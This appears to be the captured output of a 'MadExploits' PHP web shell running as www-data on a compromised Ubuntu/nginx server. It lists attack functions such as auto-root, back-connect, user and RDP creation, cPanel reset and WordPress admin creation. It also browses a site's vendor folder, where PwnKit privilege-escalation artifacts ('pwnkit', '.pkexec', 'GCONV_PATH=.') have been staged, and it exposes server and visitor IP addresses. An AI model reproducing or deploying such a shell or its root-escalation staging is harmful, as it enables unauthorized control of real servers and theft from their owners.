Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
nepalphd /
vendor /
opis /
closure /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
8.38
KB
-rwxrwxr-x
LICENSE
1.06
KB
-rwxrwxr-x
NOTICE
306
B
-rwxrwxr-x
README.md
3.75
KB
-rwxrwxr-x
autoload.php
1012
B
-rwxrwxr-x
composer.json
1.15
KB
-rwxrwxr-x
functions.php
971
B
-rwxrwxr-x
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoload.php
<?php /* =========================================================================== * Copyright (c) 2018-2021 Zindex Software * * Licensed under the MIT License * =========================================================================== */ require_once __DIR__ . '/functions.php'; spl_autoload_register(function($class){ $class = ltrim($class, '\\'); $dir = __DIR__ . '/src'; $namespace = 'Opis\Closure'; if(strpos($class, $namespace) === 0) { $class = substr($class, strlen($namespace)); $path = ''; if(($pos = strripos($class, '\\')) !== FALSE) { $path = str_replace('\\', '/', substr($class, 0, $pos)) . '/'; $class = substr($class, $pos + 1); } $path .= str_replace('_', '/', $class) . '.php'; $dir .= '/' . $path; if(file_exists($dir)) { include $dir; return true; } return false; } return false; });
Close